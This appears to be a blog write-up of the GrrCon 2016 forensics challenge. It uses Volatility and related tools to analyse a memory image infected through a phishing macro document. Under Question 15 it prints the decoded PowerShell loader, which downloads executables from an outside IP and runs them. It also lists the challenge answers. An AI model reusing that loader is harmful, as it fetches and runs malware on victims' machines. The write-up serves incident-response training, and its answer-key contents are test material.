/ grrcon

GrrCon 2016 DFIR Write up - Part 2

Level 2

Question 5)

What is the password the malware used to enable remote access to the system?

From the community Volatility section, download and call the 'editbox' plugin. Also, I didn't know, this is now included by default :)

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 --plugins=/volplugins/editbox editbox

or just

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 editbox

Note: I did find that on my compiled Volatility on Ubuntu it displayed cyrillic much better.

Answer: P59fS93m

Question 6

What was the sender email address that delivered the phishing email?

This will take a minute or so.

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 yarascan -Y "From:"

Answer: [email protected]

Question 7

What is the MD5 hash of the maldoc?(Case insensitive)

Straight to the point. We need to extract the email and get at the attachment.

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 filescan | grep pst

To dump the file like in Part 1. (hint, use unsafe -u)

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007fd38c80 -u -n --dump-dir=evidence/

I spun up a Ubuntu 64bit VM and built libpff

git clone https://github.com/libyal/libpff.git
cd libpff/
./synclibs.sh
./autogen.sh
./configure & make
cd pfftools

Run the export

pffexport [email protected]

Find the attachment. The mailbox contains many Emails/messages. Quick search highlights message 11 has an attachment!

[email protected]:~/libpff/pfftools/export/Top of Outlook data file/Inbox# ls -lash Message000*

BINGO

md5sum 1_bank_statement_088452.doc
c2dbf24a0dc7276a71dd0824647535c9  1_bank_statement_088452.doc

Answer: c2dbf24a0dc7276a71dd0824647535c9

Question 8

What is the ID given to the system by the malware for remote access? (9 digit number no spaces assigned to the remote access tool)

./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 --plugins=/volplugins/editbox editbox

Answer: 528812561

Question 9

What is the IPv4 address the actor last connected to the system with the remote access tool?

Strings the dump and match any IP address, then filter that output with anything with teamviewer matches and show lines before and after

macbook :: Desktop/mem-dumps/evidence % strings 1364.dmp | grep -B 3 -A 2 -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | grep teamviewer -B 3 -A 3

Answer: 31.6.13.155

Question 10

What is the PID the malware is running under?

macbook :: ~/Desktop/mem-dumps % ./volatility_2.5_mac -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 pslist

Answer: 1364

Question 11

What is the bit coin wallet # that a ransom was demanded for?

Using the same extraction as Q7.

more Message000*/Message.txt

Answer: 25UMDkGKBe484WSj5Qd8DhK6xkMUzQFydY

Question 12

What macro execution method does this document use?
Quick analysis of the header

Quick analysis with VT. First module in File Details

Googling Img_Painted you'll come across this ProofPoint write-up about sandbox evasion techniques being used by macros like what we have here.

Answer: Img_Painted

Question 13

What is the last Teamviewer account name the attacker uses?

Went looking for Teamviewer log files;

  • TeamViewerX_Logfile.log
  • C:\Program Files\TeamViewer\VersionX\Connections_incoming.txt
  • C:\Users\XXX\AppData\Roaming\TeamViewer\Connections.txt

Looking for any log files;

python volatility/vol.py -f /mnt/hgfs/Shared/win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 filescan | grep log
python volatility/vol.py -f /mnt/hgfs/Shared/win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 filescan | grep txt

Searched the process dump from SkypeC2AutoUpdate.exe

strings 1364.dmp | grep teamviewer -B 3 -A 3 
strings 1364.dmp | grep "Temp" | more
strings 1364.dmp | grep -A 10 -B 10 -E "[0-9]{9}" | grep -A 3 -B 3 team

I even tried Bulk Extractor and searching that data dump.

cat * | grep -A 10 -B 20 id= | grep getinfo.php
cat * | grep -A 10 -B 20 tv_id

Last go, tried the regex for the TeamViewer ID account regex.

python volatility/vol.py -f /mnt/hgfs/Shared/win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 yarascan -Y "[0-9]{9}"

No luck.

20/11/2016 - Moved over to analysing on Windows as I've come across some Unicode issues with Mac/Linux version of strings.

D:\Volatility>volatility.exe -f win7ecorpoffice2010-36b02ed3.vmem --profile=Win7SP1x64 memdump -p 1364 --dump-dir=D:\Volatility
Volatility Foundation Volatility Framework 2.5
************************************************************************
Writing SkypeC2AutoUpd [  1364] to 1364.dmp

D:\Volatility>strings64.exe 1364.dmp > strings.txt

My original regex failed so I tested it out this time round on http://regexr.com. I used the previously found TeamViewer ID using editbox.

Once happy run via Notepad++

Answer: fuckyourbears

Question 14

What file got stolen that was used in the leak of the secret backdoor project? (the data stolen actually contains information about planting a backdoor for government monitoring that was only ever communicated over email)

Trial and error. Searched for *.doc and tried each of the ones found and then moved on the various *.pst files.

Couldn't replicate to explain.

Answer: outlook.pst

Question 15

What Public Function in the word document returns the full command string that is eventually run on the system

  1. Unzip *.doc
  2. Use OfficeMalScanner
    to extract the macro from vbaProject.bin
  3. I was stuck for a while trying various methods but ended up using Kevin Breen's script to help out here; https://dotnetfiddle.net/YNtLOZ

Most the code is just nonsense until the base64 encoded string is present.

macbook :: ~ % echo "ZgBvAHIAZQBhAGMAaAAgACgAJABpACAAaQBuACAAQAAoACIAUwBrAHkAcABlAEMAMgBBAHUAdABvAFUAcABkAGEAdABlAC4AZQB4AGUAIgAsACIAVABlAGEAbQBWAGkAZQB3AGUAcgBfAEQAZQBzAGsAdABvAHAALgBlAHgAZQAiACwAIgBUAGUAYQBtAFYAaQBlAHcAZQByAF8AUgBlAHMAbwB1AHIAYwBlAF8AZQBuAC4AZABsAGwAIgAsACIAYQB2AGkAYwBhAHAAMwAyAC4AZABsAGwAIgAsACIAdAB2AF8AdwAzADIALgBkAGwAbAAiACwAIgB0AHYAXwB3ADMAMgAuAGUAeABlACIALAAiAHQAdgBfAHgANgA0AC4AZABsAGwAIgAsACIAdAB2AF8AeAA2ADQALgBlAHgAZQAiACwAIgB0AHYAcgAuAGMAZgBnACIALAAiAHYAcABuAC4AZQB4AGUAIgApACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADUANAAuADEANwA0AC4AMQAzADEALgAyADMANQAvAGYAaQBsAGUAcwAvACQAaQAiACwAIAAiACQAZQBuAHYAOgB0AGUAbQBwAC8AJABpACIAKQB9ADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAGUAbgB2ADoAVABFAE0AUAAvAFMAawB5AHAAZQBDADIAQQB1AHQAbwBVAHAAZABhAHQAZQAuAGUAeABlACIAIAAtAFcAbwByAGsAaQBuAGcARABpAHIAZQBjAHQAbwByAHkAIAAiACQAZQBuAHYAOgBUAEUATQBQACIA" | base64 -D
foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP"%

This is the main command which is called by UsoJar

foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP"%

This aligns with what we saw in the Bro logs earlier in Part 1 where we see the http.log calling each of the files listed here.

Answer: UsoJar